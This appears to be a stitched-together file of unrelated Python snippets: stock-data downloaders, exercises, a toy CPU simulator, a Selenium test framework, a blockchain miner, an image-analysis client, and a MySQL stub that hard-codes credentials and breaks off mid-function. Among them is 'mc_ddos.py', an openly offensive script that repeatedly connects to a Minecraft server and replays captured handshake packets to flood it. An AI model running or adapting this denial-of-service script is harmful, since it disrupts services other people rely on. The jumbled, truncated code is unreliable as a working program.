          "2012q1","2012q2","2012q3","2012q4","2012", \
          "2013q1","2013q2","2013q3","2013q4","2013", \
          "2014q1","2014q2","2014q3","2014q4","2014", \
          "2015q1","2015q2","2015q3","2015q4","2015", \
          "2016q1","2016q2","2016q3","2016q4","2016", \
          "2017q1","2017q2","2017q3","2017q4","2017", \
          "2018q1","2018q2","2018q3","2018q4","2018"]
# Download the balance-sheet table, one CSV per stock code.
for i in range(0,len(stock_info)):
    filepath = balance_file_path + str(stock_info.iloc[i,0]) + ".csv"
    q = query(balance).filter(balance.code == stock_info.iloc[i,0])
    df_balance = get_fundamentals(q,statDate = "2006q1")
    # NOTE(review): "2006q1" is fetched again inside the loop, so its rows
    # are duplicated in the output.
    for date in statdate:
        tmp = get_fundamentals(q,statDate=date)
        df_balance = pd.concat([df_balance,tmp])
    df_balance.to_csv(filepath)
    print("get balance code:%r successful"%(stock_info.iloc[i,0]))
# Download the cash-flow table, one CSV per stock code.
for i in range(0,len(stock_info)):
    filepath = cash_flow_file_path + str(stock_info.iloc[i,0]) + ".csv"
    q = query(cash_flow).filter(cash_flow.code==stock_info.iloc[i,0])
    df_cash = get_fundamentals(q, statDate = "2006q1")
    # NOTE(review): "2006q1" rows are duplicated (fetched again in the loop).
    for date in statdate:
        tmp = get_fundamentals(q,statDate=date)
        df_cash = pd.concat([df_cash,tmp])
    df_cash.to_csv(filepath)
    print("get cash flow code:%r successful"%(stock_info.iloc[i,0]))
# Download the income-statement table, one CSV per stock code.
for i in range(0,len(stock_info)):
    filepath = income_file_path + str(stock_info.iloc[i,0]) + ".csv"
    q = query(income).filter(income.code==stock_info.iloc[i,0])
    df_income = get_fundamentals(q, statDate = "2006q1")
    # NOTE(review): "2006q1" rows are duplicated (fetched again in the loop).
    for date in statdate:
        tmp = get_fundamentals(q,statDate=date)
        df_income = pd.concat([df_income,tmp])
    df_income.to_csv(filepath)
    print("get income code:%r successful"%(stock_info.iloc[i,0]))
# Download the financial-indicator table, one CSV per stock code.
for i in range(0,len(stock_info)):
    filepath = indicator_file_path + str(stock_info.iloc[i,0]) + ".csv"
    q = query(indicator).filter(indicator.code==stock_info.iloc[i,0])
    df_indicator = get_fundamentals(q, statDate = "2006q1")
    # NOTE(review): "2006q1" rows are duplicated (fetched again in the loop).
    for date in statdate:
        tmp = get_fundamentals(q,statDate=date)
        df_indicator = pd.concat([df_indicator,tmp])
    df_indicator.to_csv(filepath)
    print("get indicator code:%r successful"%(stock_info.iloc[i,0]))
#Reverse string
# Python 2 script: read a line and print its characters in reverse order,
# separated by spaces (print with trailing comma).
s1=raw_input("Enter a String : ")
# NOTE(review): the appended space becomes the FIRST character of the
# reversed output -- looks unintentional; confirm before removing.
s1=s1+" "
# s2 is assigned but never used.
s2=" "
print "reverse string is =",
for i in range(len(s1)-1,-1,-1):
    k=s1[i]
    print k,
|
# Read a starting value x, then keep reading until a value z greater than x
# is entered.
x = int(input())
z = int(input())
cont = 0
while cont < 1:
    if z <= x:
        z = int(input())
    else:
        cont += 1
# Count how many consecutive integers x, x+1, x+2, ... must be summed before
# the running total exceeds z, and print that count.
soma = 0
cont2 = 0
cont3 = 0
while cont2 < 1:
    soma = soma + x
    if soma > z:
        cont2 += 1
    cont3 += 1
    x += 1
print(cont3)
|
class PretrainedConfig(object):
    """Minimal stub of a pretrained-model configuration.

    Stores nothing: constructor keyword arguments are accepted and discarded.
    """
    # Mapping from model shortcut names to archive URLs (empty in this stub).
    pretrained_config_archive_map = {}  # type: Dict[str, str]
    # Identifier of the model family (empty in this stub).
    model_type = ""  # type: str

    def __init__(self, **kwargs):
        # Accept and ignore arbitrary keyword arguments.
        pass
|
# Classify each word in CW2016_03.in: "likes" words containing a doubled
# letter (two equal adjacent characters), "hates" all others.
def _has_adjacent_repeat(word):
    """Return True if `word` contains two equal adjacent characters."""
    return any(a == b for a, b in zip(word, word[1:]))

with open("CW2016_03.in", "r") as f:
    # First line holds the number of words that follow.
    count = int(f.readline())
    for i in range(count):
        word = f.readline().strip()
        # Fix: the original indexed word[0] unconditionally and crashed with
        # IndexError on a blank line; zip-based pairing handles "" safely.
        if _has_adjacent_repeat(word):
            print("likes ", word)
        else:
            print("hates ", word)
|
def saveJumpLabel(asm, labelIndex, labelName, labelAddr):
    """Collect jump-label metadata from assembly lines, then drop blank lines.

    For every line containing ':' (spaces removed first), appends the label
    text before the colon to `labelName`, its line index to `labelIndex`,
    and its byte address (index * 4) to `labelAddr`.  Finally removes every
    bare newline entry from `asm` in place.
    """
    for idx, raw in enumerate(asm):
        compact = raw.replace(" ", "")
        if ":" in compact:
            labelName.append(compact[:compact.index(":")])
            labelIndex.append(idx)
            labelAddr.append(idx * 4)
    # Strip all empty lines from the program listing.
    while "\n" in asm:
        asm.remove("\n")
#setting ip registers
def regNameInit(regName):
    """Populate `regName` in place with register names '0'..'4', 'lo', 'hi'."""
    regName.extend(str(n) for n in range(5))
    regName.extend(("lo", "hi"))
#created list to read non empty and un commented lines
def splitText(text):
    """Split raw program text on newlines (keeps a trailing empty entry)."""
    separator = "\n"
    return text.split(separator)
def readIn(s):
    """Read file `s` and return its text minus blank lines and '#' comment lines."""
    kept = []
    with open(s, "r") as f:
        for line in f:
            if line != "\n" and line[0] != '#':
                kept.append(line)
    return "".join(kept)
def main():
# starting with 259 spots in MEM
MEM = [0] * 259
regName = []
PC = 0
DIC = 0
regNameInit(regName)
regval = [0] * 7 # 0-3, A, lo and hi
LO = 4
HI = 5
A = 6
regval[A] = 1
good_in = False
mem_addr = 0x0004
#op code declarations
initlo = "00"
inithi = "10" # has to be checked before ld and st(last ones)
xor = "0010"
sinc2b = "0011"
addu = "0110"
and1 = "1000"
srl = "1010"
Fold = "1101"
sub = "1111"
Hash_branch = "1110"
LA = "0000"
pat_Count = "0101"
#bit of UI
while (good_in == False):
file_Name = input("Please type file name, enter for default, or q to quit:\n")
if (file_Name == "q"):
print("Bye!")
return
if (file_Name == ""):
file_Name = "FA_mc.txt"
try:
f = open(file_Name)
f.close()
good_in = True
except FileNotFoundError:
print('File does not exist')
f = open("output.txt", "w+")
text = readIn(file_Name)
t = splitText(text)
lineCount = 0
while (lineCount < len(t)):
line = t[lineCount]
#starting to print to output.txt
f.write('------------------------------ \n')
if (not (':' in line)):
f.write('MIPS Instruction: ' + line + '\n')
if(line[0:4] == srl):
DIC += 1
# XXXXSSTT
#always to $3
PC += 4
RT = regval[int(line[6:8], 2)]
regval[3] = regval[int(line[4:6],2)] >> RT
f.write('Operation: $' + str(int(line[6:8],2)) + ' = ' + str(regval[int(line[6:8],2)]) + '; ' + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('DIC is now at '+str(DIC))
#this branch does pattern count by using 4 different
#if statements, it was implemented in hardware using Muxes
elif(line[0:4] == pat_Count):
DIC += 1
PC += 4
pattern = regval[int(line[6:8],2)]
if(pattern == 0):
MEM[0] += 1
y = 0
elif(pattern == 1):
MEM[1] += 1
y = 1
elif(pattern == 2):
MEM[2] += 1
y = 2
elif(pattern == 3):
MEM[3] += 1
y = 3
f.write('Operation: MEM[+'+str(y)+'] = ' + str(regval[int(line[6:8],2)]) + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('DIC is now at '+str(DIC))
elif (line[0:4] == sinc2b):
DIC += 1
PC += 4
X = regval[int(line[6:8],2)]
MEM[mem_addr] = X
mem_addr += 1
f.write('Operation: MEM[$' + str(mem_addr-1) + '] = ' + str(regval[int(line[6:8],2)]) + '; ' + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('DIC is now at '+str(DIC))
#This instuction will load the unaddressable register A into an addressable register
elif(line[0:4] == LA):
DIC += 1
PC += 4
regval[int(line[6:8],2)] = regval[A]
f.write('Operation: $' + str(int(line[6:8],2)) + ' = ' + str(regval[int(line[6:8],2)]) + '; ' + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('DIC is now at '+str(DIC))
# addu not really implemented, but in theory in should be,
# however we wrote the input so it doesn't cause any issues
# at the moment
elif(line[0:4] == addu):
DIC += 1
PC += 4
regval[int(line[4:6],2)] += regval[int(line[6:8],2)]
f.write('Operation: $' + str(int(line[4:6],2)) + ' = ' + str(regval[int(line[4:6],2)]) + '; ' + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('DIC is now at '+str(DIC))
#this instruction is mainly used for setting equal to 0
elif(line[0:4] == sub):
DIC += 1
PC += 4
regval[int(line[4:6],2)] -= regval[int(line[6:8],2)]
f.write('Operation: $' + str(int(line[4:6],2)) + ' = ' + str(regval[int(line[4:6],2)]) + '; ' + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('DIC is now at '+str(DIC))
#andi
elif(line[0:4] == and1):
DIC += 1
PC += 4
regval[int(line[4:6],2)] = regval[int(line[4:6],2)] & regval[int(line[6:8],2)]
f.write('Operation: $' + str(int(line[4:6],2)) + ' = ' + str(regval[int(line[4:6],2)]) + '; ' + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('DIC is now at '+str(DIC))
# xor
elif (line[0:4] == xor):
DIC += 1
PC += 4
regval[0] = regval[int(line[4:6],2)] ^ regval[int(line[6:8],2)]
f.write('Operation: $0 = ' + str(regval[0]) + '; ' + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('DIC is now at '+ str(DIC))
#Fold
elif (line[0:4] == Fold):
#Always comes out from C = $0
DIC += 1
PC += 4
result = regval[int(line[4:6],2)] * regval[int(line[6:8],2)]
regval[LO] = result & 0b11111111
regval[HI] = result >> 8
regval[int(line[6:8],2)] = regval[HI] ^ regval[LO]
f.write('Operation: $' + str(0) + ' = ' + str(regval[0]) + '; ' + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('DIC is now at '+str(DIC))
#initli: lower 4 bit intialization (only usable with $1)
elif (line[0:2] == initlo):
DIC += 1
PC += 4
reg = int(line[2:4], 2)
imm = int(line[4:8], 2)
regval[reg] += imm
f.write('Operation: $' + str(reg) + ' lower 4 bits = ' + str(imm) + '; ' + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('DIC is now at '+str(DIC))
#initui: upper 4 bit intialization (only usable with $1)
elif (line[0:2] == inithi):
DIC += 1
PC += 4
reg = int(line[2:4], 2)
imm = int(line[4:8], 2)
regval[reg] += imm << 4
f.write('Operation: $' + str(reg) + ' upper 4 bits = ' + str(imm) + '; ' + '\n')
f.write('PC is now at ' + str(PC) + '\n')
f.write('Registers that have changed: ' + '$' + str(reg) + ' = ' + str(imm) + '\n')
f.write('DIC is now at '+str(DIC))
# Specific branch function to be used with hash only
# it loops back to the first line of the code and
# increments contents of register A till it's 255
elif (line[0:4] == Hash_branch):
DIC += 1
if(regval[A] != 255):
PC = 0
lineCount = 0
regval[A] += 1
f.write('PC is now at ' + str(PC) + '\n')
f.write('Branch Taken. No Registers have changed. \n')
f.write('DIC is now at '+str(DIC))
continue
f.write('Branch not taken, no Registers have changed. \n')
f.write('DIC is now at '+str(DIC))
PC += 4
lineCount += 1
f.write("REGISTERS:")
f.write("-----------")
for x in range(len(regval)):
if (x == LO):
f.write("LO: " + str(hex(regval[x])))
elif (x == HI):
f.write("HI: " + str(hex(regval[x])))
elif (x == A):
f.write("A: " + str(hex(regval[x])))
else:
f.write("$"+ str(x) + ": " + str(hex(regval[x])))
f.write("PC: " + str(hex(PC)))
f.write("DIC: " + str(hex(DIC)))
f.write("\n")
f.write("USED MEMORY VALUES:\n")
f.write("---------------------------------------------------------------------\n")
for x in range(4, len(MEM), 1):
f.write("At " + str(x) + "\tA = " + str(x-3) +"\tC = "+ str(MEM[x]) + " ")
if (x - 3) % 4 == 0:
f.write("\n")
f.write("\n")
f.write("\nMODES OF 2 BIT BINARY RESULTS (in decimal)\n")
f.write("----------------------------------------")
for x in range (0,4,1):
f.write("\nMem["+str(x)+"] = ")
f.write(str(MEM[x]))
f.write("\n")
f.close()
# Script entry point: run the micro-architecture simulator defined above.
main()
|
# 76. Minimum Window Substring
# Given two strings s and t of lengths m and n respectively,
# return the minimum window substring
# of s such that every character in t (including duplicates) is included in the window.
# If there is no such substring, return the empty string "".
# The testcases will be generated such that the answer is unique.
# Example 1:
# Input: s = "ADOBECODEBANC", t = "ABC"
# Output: "BANC"
# Explanation: The minimum window substring "BANC" includes 'A', 'B', and 'C' from string t.
# Example 2:
# Input: s = "a", t = "a"
# Output: "a"
# Explanation: The entire string s is the minimum window.
# Example 3:
# Input: s = "a", t = "aa"
# Output: ""
# Explanation: Both 'a's from t must be included in the window.
# Since the largest window of s only has one 'a', return empty string.
from collections import Counter
def minWindow(s, t):
    """Return the smallest substring of *s* that contains every character
    of *t* (with multiplicity), or "" when no such window exists.

    Sliding-window technique: `need` tracks how many of each character are
    still required; `missing` is the total count of required characters the
    current window does not yet contain.
    """
    need = Counter(t)
    missing = len(t)
    left = 0
    best_start, best_end = 0, 0
    for right, ch in enumerate(s, 1):        # right is 1 past the window end
        if need[ch] > 0:
            missing -= 1
        need[ch] -= 1
        if missing == 0:
            # Shrink from the left while the window holds surplus characters.
            while need[s[left]] < 0:
                need[s[left]] += 1
                left += 1
            # Record the window if it is the first found or no larger than best.
            if best_end == 0 or right - left <= best_end - best_start:
                best_start, best_end = left, right
            # Give back the leftmost required char and hunt for the next window.
            need[s[left]] += 1
            left += 1
            missing += 1
    return s[best_start:best_end]
if __name__ == "__main__":
    # Demo run: the expected minimum window is "BANC".
    sample = "ADOBECODEBANC"
    target = "ABC"
    result = minWindow(sample, target)
    print("The characters are {}".format(result))
|
# encoding: utf-8
#用于实现具体动作,比如输入数据框
from selenium import webdriver
from config.VarConfig import ieDriverFilePath
from config.VarConfig import chromeDriverFilePath
from config.VarConfig import firefoxDriverFilePath
from util.ObjiectMap import getElement,getElements
from selenium.webdriver.support.ui import Select
from util.ClipboardUtil import Clipbard
from util.KeyBoradUtil import KeyboardKeys
from util.DirAndTime import *
from util.WaitUtil import WaitUtil
# from config.VarConfig import *
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.support import expected_conditions as EC
import time
from selenium.webdriver.common.keys import Keys
import json
# Global WebDriver instance shared by every keyword function in this module.
driver = None
# Global wait-helper instance (created in open_browser once driver exists).
waitUtil = None
def open_browser(browserName, *args):
    """Launch a browser and create the shared WaitUtil helper.

    browserName: 'ie', 'firefox', or anything else (falls back to Chrome).
    Side effects: rebinds the module-level ``driver`` and ``waitUtil``.
    """
    global driver, waitUtil
    try:
        name = browserName.lower()
        if name == 'ie':
            driver = webdriver.Ie(executable_path=ieDriverFilePath)
        # BUG FIX: the original compared .lower() against 'Firfox' (capital F
        # and misspelled), which can never match, so requesting Firefox
        # silently launched Chrome instead.
        elif name == 'firefox':
            driver = webdriver.Firefox(executable_path=firefoxDriverFilePath)
        else:
            driver = webdriver.Chrome(executable_path=chromeDriverFilePath)
        # Driver created successfully: build the shared explicit-wait helper.
        waitUtil = WaitUtil(driver)
    except Exception as e:
        raise e
def visit_url(url,*arg):
    # Navigate the shared driver to the given URL.
    global driver
    try:
        driver.get(url)
    except Exception as e:
        raise e
def close_browser(*arg):
    # Quit the browser and release the WebDriver session.
    global driver
    try:
        driver.quit()
    except Exception as e:
        raise e
def sleep(sleepSeconds, *arg):
    """Hard wait: pause execution for *sleepSeconds* seconds (string or int)."""
    try:
        seconds = int(sleepSeconds)
        time.sleep(seconds)
    except Exception as e:
        raise e
def clear(loctaionType, locatiorExpression, *arg):
    # Clear the default text of the located input element.
    # (Parameter names keep the original misspellings for compatibility.)
    global driver
    try:
        getElement(driver, loctaionType, locatiorExpression).clear()
    except Exception as e:
        raise e
def input_string(locationType, locatorExpression, inputContent):
    # Type *inputContent* into the located page input element.
    global driver
    try:
        getElement(driver, locationType, locatorExpression).send_keys(inputContent)
        # print(inputContent)
    except Exception as e:
        raise e
def click(locationType, locatorExpression, *arg):
    # Single-click the located page element.
    global driver
    try:
        getElement(driver, locationType, locatorExpression).click()
    except Exception as e:
        raise e
def assert_string_in_pagesource(assertSring, *arg):
    """Assert that *assertSring* occurs in the current page source.

    Raises AssertionError when the text is absent.
    """
    global driver, waitUtil
    try:
        # FIX: the failure message had a typo ("foud"), and the original
        # caught ArithmeticError, which an assert statement can never raise —
        # catch AssertionError so the re-wrap branch is actually reachable.
        assert assertSring in driver.page_source, "%s not found in page source!" % assertSring
    except AssertionError as e:
        raise AssertionError(e)
    except Exception as e:
        raise e
def assert_title(titleStr, *args):
    """Assert that *titleStr* occurs in the current page title.

    Raises AssertionError when the text is absent.
    """
    global driver, waitUtil
    try:
        assert titleStr in driver.title, \
            "%s not found in title!" % titleStr
    # FIX: the original caught ArithmeticError, which an assert statement can
    # never raise — catch AssertionError so the re-wrap branch is reachable.
    except AssertionError as e:
        raise AssertionError(e)
    except Exception as e:
        raise e
def getTitle(*arg):
    # Return the current page title.
    global driver
    try:
        return driver.title
    except Exception as e:
        raise e
def getPageSouce(*arg):
    # Return the current page source.
    # (Function name keeps the original misspelling for caller compatibility.)
    global driver
    try:
        return driver.page_source
    except Exception as e:
        raise e
def switch_to_frame(locationType, frameLocatorExpression, *arg):
    # Locate a frame element and switch the driver's context into it.
    global driver
    try:
        driver.switch_to.frame(getElement
                               (driver, locationType, frameLocatorExpression))
    except Exception as e:
        print("frame error")
        raise e
def switch_to_default_content(*arg):
    # Switch the driver's context back out of any frame to the top document.
    global driver
    try:
        driver.switch_to.default_content()
    except Exception as e:
        raise e
# Click every checkbox element matched by the locator.
def clickCheckBox(locationType,framelocatorExpression,*args):
    # Finds all matching elements and clicks each one in turn.
    global driver,waitUtil
    try:
        ListElement=getElements(driver,locationType,framelocatorExpression)
        print(ListElement)  # debug output of the matched elements
        for element in ListElement:
            element.click()
    except Exception as e:
        raise e
# #下拉列表选择
# def selecter_list(locationType,framelocatorExpression,textValue,*args):
# global driver,waitUtil
# try:
# select_element=Select(getElement(driver,locationType,framelocatorExpression))
# select_element.select_by_visible_text(textValue)
# value= select_element.all_selected_options[0].text
# assert value==textValue,"断言失败,当前选择的不是%s"%textValue
# except AssertionError as e:
# raise AssertionError(e)
# except Exception as e:
# raise e
# else:
# logger.info("\033[1;32;m关键字%s选择成功\033[0m" % textValue)
# Log into a page in the existing browser by replaying saved cookies.
def new_browser(url):
    """Open *url*, inject cookies from a saved file, then refresh so the
    session appears logged in.

    NOTE(review): the cookie file path is hard-coded, and this relies on the
    module-level ``driver`` having been created by open_browser() already.
    """
    driver.set_page_load_timeout(20)
    driver.set_script_timeout(20)
    try:
        driver.get(url)
    # FIX: the original used a bare `except:`; catch Exception so
    # KeyboardInterrupt/SystemExit still propagate.
    except Exception:
        # Page-load timeout: stop loading and continue with what we have.
        driver.execute_script("window.stop()")
    time.sleep(5)
    # FIX: the original opened the cookie file and never closed it.
    with open(r'G:\KeyWordFromeWork\testData\cookies4.12.01.txt') as cookie_file:
        cookies = json.loads(cookie_file.read())
    # Add each saved cookie to the not-yet-logged-in page.
    for co in cookies:
        driver.add_cookie(co)
    driver.refresh()  # refresh again to obtain the logged-in page
    time.sleep(5)
def paste_string(pasteString, *arg):
    # Simulate Ctrl+V: put the text on the clipboard, then send the paste keys.
    global driver
    try:
        Clipbard.setTest(pasteString)
        # Wait 2 seconds so the clipboard is populated before pasting.
        time.sleep(2)
        KeyboardKeys.twoKeys("ctrl", "v")
    except Exception as e:
        raise e
def press_tab_key(*arg):
    # Simulate pressing the Tab key.
    try:
        KeyboardKeys.oneKey("tab")
    except Exception as e:
        raise e
def press_enter_key(*arg):
    # Simulate pressing the Enter key.
    try:
        KeyboardKeys.oneKey("enter")
    except Exception as e:
        raise e
def maximize_brower():
    # Maximize the browser window.
    # (Function name keeps the original misspelling for caller compatibility.)
    global driver
    try:
        driver.maximize_window()
    except Exception as e:
        raise e
def capture_screen(*args):
    # Save a screenshot into the current date's directory and return its path.
    # NOTE(review): builds a Windows-style path with "\\" and then re-escapes
    # backslashes before saving — presumably Windows-only; verify elsewhere.
    global driver
    currTime = getCurrentTime()
    picNameAndPath = str(createCureenDateDir()) + "\\" + str(currTime) + ".Png"
    try:
        driver.get_screenshot_as_file(picNameAndPath.replace('\\', r'\\'))
    except Exception as e:
        raise e
    else:
        # Only return the path when the screenshot succeeded.
        return picNameAndPath
def waitPressenceOfElementLocated(locationType, locatorExprexxion, *arg):
    # Explicit wait until the element exists in the DOM (not necessarily visible).
    global waitUtil
    try:
        waitUtil.presenceOfeElmentLocated(locationType, locatorExprexxion)
    except Exception as e:
        raise e
def waitFrameToBeAvailableAndSwitchToIt(locationType, locatorExprexxion, *args):
    # Locate the frame and switch the driver's context into it.
    # NOTE(review): despite the name there is no explicit wait here — it
    # switches immediately via getElement.
    global driver
    try:
        driver.switch_to.frame(getElement(driver,locationType, locatorExprexxion))
    except Exception as e:
        # print("error...")
        raise e
def waitVisibilityOfElementLocated(locationType, locatorExprexxion):
    # Explicit wait until the element is present in the DOM and visible.
    global waitUtil
    try:
        waitUtil.visibilityOfElementLocated(locationType, locatorExprexxion)
    except Exception as e:
        raise e
if __name__ =="__main__":
    # NOTE(review): ad-hoc smoke test — `driver` is still None here because
    # open_browser() is never called, so this raises as written.
    assert_string_in_pagesource("发送成功")
import socket
import sys
# Python 2 script (print statements, str.decode("hex")): repeatedly opens TCP
# connections to a Minecraft server (default port 25565) and replays two
# captured handshake packets in an infinite loop.
try:
    host = sys.argv[1]
    port = 25565
except IndexError:
    print "[+] Usage %s <host> " % sys.argv[0]
    print "[i] Example: mc_ddos.py localhost"
    sys.exit()
#rootbuffer = "1000bc02093132372e302e302e3163dd020900076d65726b333630" #other buffer switch if you want to
#rootbuffer = "1000bc020931302e302e312e313263dd020900076d65726b333630" #other buffer switch if you want to
rootbuffer = "1500bc020e3135382e36392e3132322e31333463dd020900076d65726b333630" # test buffer not fully functional
# Hex-encoded packet bytes; str.decode("hex") is Python 2 only.
buffer = rootbuffer.decode("hex")
#Second packet information for mc server ddos
secondbufferhex = "85020180017b757f9c415785c2515086c02fbb353ec7e8fa1dbd52d722145e7a47623e1b88b5e427d5737989e202000cca4acad2ad8566a1da11e015c12e060c0bb6e62deace9ccb8658e1d2190bc2b0c33fd01d6b58b5c9406638f2b221fa82b46e9b399dea8b6dfe21ff49f85bf6ef05eff5c82d909e0a4c74e3c528f45b7bee216d24fa800174a01e725d9a5308ede10f09e12e18f15ce25241fb7dbc2f927a9558d29f879f4512b3a1eb26fc1bb6eaab7ec300a7e5607a06d655334624a55eebd6856cd790a4ac78728b4ec6b96eca403ec9d103cdf178b6127e3a592050546318cd09806737b1bd8aa5374b67228d192269424d6c5f27c1c183c86798708b6bb259c9f71c"
secondbuffer = secondbufferhex.decode("hex")
while 1:
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect=s.connect((host,port))
    s.settimeout(4500) # change for different effect based on target max timeout
    sendbuffer = buffer
    s.send(sendbuffer)
    s.recv(4906)
    s.send(secondbuffer)
    # NOTE(review): SOL_SOCKET and TCP_WINDOW_CLAMP are unqualified names
    # (only `import socket` above), so this line raises NameError as written.
    s.setsockopt(SOL_SOCKET, TCP_WINDOW_CLAMP, 5)
    s.close()
|
'''
Created on Oct 24, 2016
@author: Noor Jahan Mukammel
Program: set_method: remove(el)
 * works like discard()
 * but if el is not a member of the set
 * a KeyError will be raised.
'''
x = {"a","b","c","d","e"}
print(x.remove("a")) # set.remove() mutates in place and returns None, so this prints "None"
print(x)
# x.remove("z") # would raise KeyError because "z" is not an element of set x
import threading
import hashlib
import json
import sys
from datetime import datetime, timezone
from random import randint
from collections import namedtuple
import blockchain
# Immutable record bundling the fields that make up one block's header.
Headers = namedtuple(
    'Headers',
    ['index', 'time', 'nonce', 'tx', 'mrkl_root', 'curr_hash', 'prev_hash'],
)
class Miner:
    """Proof-of-work miner that hashes block headers on a background thread.

    A miner stops when it either finds a hash with ``difficulty`` leading
    zeros that the blockchain accepts, or ``mined_evt`` is set (meaning some
    other miner won the race).
    """

    def __init__(self, address, version, _blockchain, mined_evt):
        # Wallet/public address credited in the block's 'relayed_by' field.
        self._address = address
        self._version = version['id']
        self._difficulty = version['difficulty']
        self._blockchain = _blockchain
        self._mined_evt = mined_evt
        # Worker thread; created lazily in start().
        self._t = None

    def start(self, headers, txs):
        """Begin mining on a background thread.

        NOTE(review): `headers` is forwarded into run()'s `time` parameter —
        callers actually pass a timestamp string; the name is misleading.
        """
        self._t = threading.Thread(target=self.run, args=(headers, txs))
        self._t.start()

    @staticmethod
    def create_hash(encoded_headers_arr, nonce):
        """Return the SHA-256 hex digest of the concatenated encoded
        headers followed by the stringified nonce."""
        encoded_headers = b''.join(
            encoded_headers_arr + [str(nonce).encode()])
        return hashlib.sha256(encoded_headers).hexdigest()

    @staticmethod
    def create_merkle_root(transactions):
        """Hash all transactions serialized as canonical (sorted-key) JSON.

        NOTE(review): despite the name this is a single flat SHA-256 over the
        concatenated transactions, not a true Merkle tree.
        """
        def encode(transaction):
            return json.dumps(
                transaction, sort_keys=True).encode()
        encoded_list = [encode(transaction) for transaction in transactions]
        encoded_bytes = b''.join(encoded_list)
        return hashlib.sha256(encoded_bytes).hexdigest()

    def run(self, time, txs):
        """Worker loop: try random nonces until the difficulty target is met
        and accepted, or another miner sets the mined event."""
        prev_block = self._blockchain.get_last_block()
        index = str(int(prev_block["index"]) + 1)
        prev_hash = prev_block["hash"]
        mrkl_root = self.create_merkle_root(txs)
        headers = [index, time, mrkl_root, prev_hash]
        nonce = randint(0, sys.maxsize)
        encoded_header_arr = [val.encode() for val in headers]
        block_hash = self.create_hash(encoded_header_arr, nonce)
        while not self._mined_evt.is_set():
            # A hash qualifies when its first `difficulty` chars are all '0'.
            if block_hash[:self._difficulty] == ''.zfill(self._difficulty):
                block_headers = Headers(
                    index, time, nonce, txs, mrkl_root, block_hash, prev_hash)
                block = self.create_block(block_headers)
                res = self._blockchain.offer_proof_of_work(
                    block, self._mined_evt)
                if res:
                    break
            # Try the next random nonce.
            nonce = randint(0, sys.maxsize)
            block_hash = self.create_hash(encoded_header_arr, nonce)

    def create_block(self, block_headers):
        """Create a new block from a Headers record.

        Returns:
            Dict[str, Any]: The newly created block.
        """
        return {
            'index': str(block_headers.index),
            "ver": self._version,
            'time': block_headers.time,
            'nonce': str(block_headers.nonce),
            'tx': block_headers.tx,
            'n_tx': len(block_headers.tx),
            'mrkl_root': block_headers.mrkl_root,
            'hash': block_headers.curr_hash,
            'previous_hash': block_headers.prev_hash,
            'relayed_by': self._address,
        }

    def join(self):
        """Block until the worker thread finishes."""
        self._t.join()
# Shared lock handed to the blockchain so concurrent miners can offer proofs safely.
lock = threading.Lock()
# NOTE: this rebinds the imported `blockchain` module name to a Blockchain instance.
blockchain = blockchain.Blockchain(1, 4, [], None, lock)
def mine_block():
    """Race six miner threads over the same transaction list and wait for
    all of them to finish (the first accepted proof stops the others via
    the shared event)."""
    mined_evt = threading.Event()
    timestamp = datetime.now(timezone.utc).strftime("%d-%b-%Y (%H:%M:%S.%f)")
    # One miner per wallet address; all share version/difficulty settings.
    wallet_ids = ['1', '2', '3', '6', '4', '9']
    version = {'id': 1, 'difficulty': 4}
    workers = [Miner(addr, version, blockchain, mined_evt) for addr in wallet_ids]
    for worker in workers:
        worker.start(timestamp, [{'sender': 'me'}])
    for worker in workers:
        worker.join()
# Mine 20 blocks sequentially, then print each block's index.
for i in range(20):
    mine_block()
# blockchain.print_chain()
for block in blockchain:
    print(block["index"])
|
import httplib
import urllib
import base64
import json
import sys
import settings
from syslogger import logger
def get_tags(data, conf_threshold=settings.confidence_threshold):
    """Return a comma-separated string of tag names from the vision API
    response whose confidence meets *conf_threshold* ("" when none do)."""
    accepted = [tag["name"] for tag in data["tags"]
                if float(tag["confidence"]) >= conf_threshold]
    return ", ".join(accepted)
def get_celebrities(data, conf_threshold=settings.confidence_threshold):
    """Return a comma-separated string of celebrity names (confidence >=
    *conf_threshold*) gathered across every category with a detail section."""
    names = []
    for category in data["categories"]:
        detail = category.get("detail")
        if detail is None:
            continue
        for celeb in detail["celebrities"]:
            if celeb["confidence"] >= conf_threshold:
                names.append(celeb["name"])
    return ", ".join(names)
def analyse_image(source_image, az_subs_key=settings.subscription_key):
    """POST an image file to the vision API and return a dict with the
    recognised 'tags' and 'celebrities' strings.

    Returns None (after logging a warning) on any failure — callers should
    handle that case.
    """
    headers = {
        # Request headers
        'Content-Type': 'application/octet-stream',
        'Ocp-Apim-Subscription-Key': az_subs_key,
    }
    params = urllib.urlencode({
        # Request parameters
        'visualFeatures': 'Tags, Description',
        'details': 'Celebrities',
    })
    try:
        # FIX: read in binary mode ('rb') — the payload is an image and text
        # mode corrupts it on Windows; 'with' guarantees the handle is closed.
        with open(source_image, 'rb') as f:
            post_body = f.read()
        conn = httplib.HTTPSConnection('api.projectoxford.ai')
        try:
            conn.request("POST", "/vision/v1.0/analyze?%s" % params, post_body, headers)
            response = conn.getresponse()
            js_data = response.read()
        finally:
            # FIX: close the connection even when the request/read raises.
            conn.close()
        logger.debug("Azure Analyse returned {}".format(js_data))
        data = json.loads(js_data)
        return { 'tags' : get_tags(data), 'celebrities' : get_celebrities(data) }
    except Exception as e:
        logger.warning(e)
|
from urllib2 import urlopen
import json
import statsmodels.api as sm
import pandas
from datetime import datetime
import time
from sqlalchemy import create_engine #SQLAlchemy might need to be installed and PyMYSQL
import calendar
def create_connection():
    # Open a raw MySQL connection via SQLAlchemy; returns (cursor, connection).
    # SECURITY(review): credentials are hard-coded — move to config/env.
    engine = create_engine('mysql+pymysql://aashu:aashu@localhost/apidata', connect_args= dict(host='127.0.0.1'),echo=False)
    cnxn = engine.raw_connection()
    cursor = cnxn.cursor()
    return cursor, cnxn
# Module-level connection shared by predict(); opened at import time.
cursor, cnxn = create_connection()
def predict():
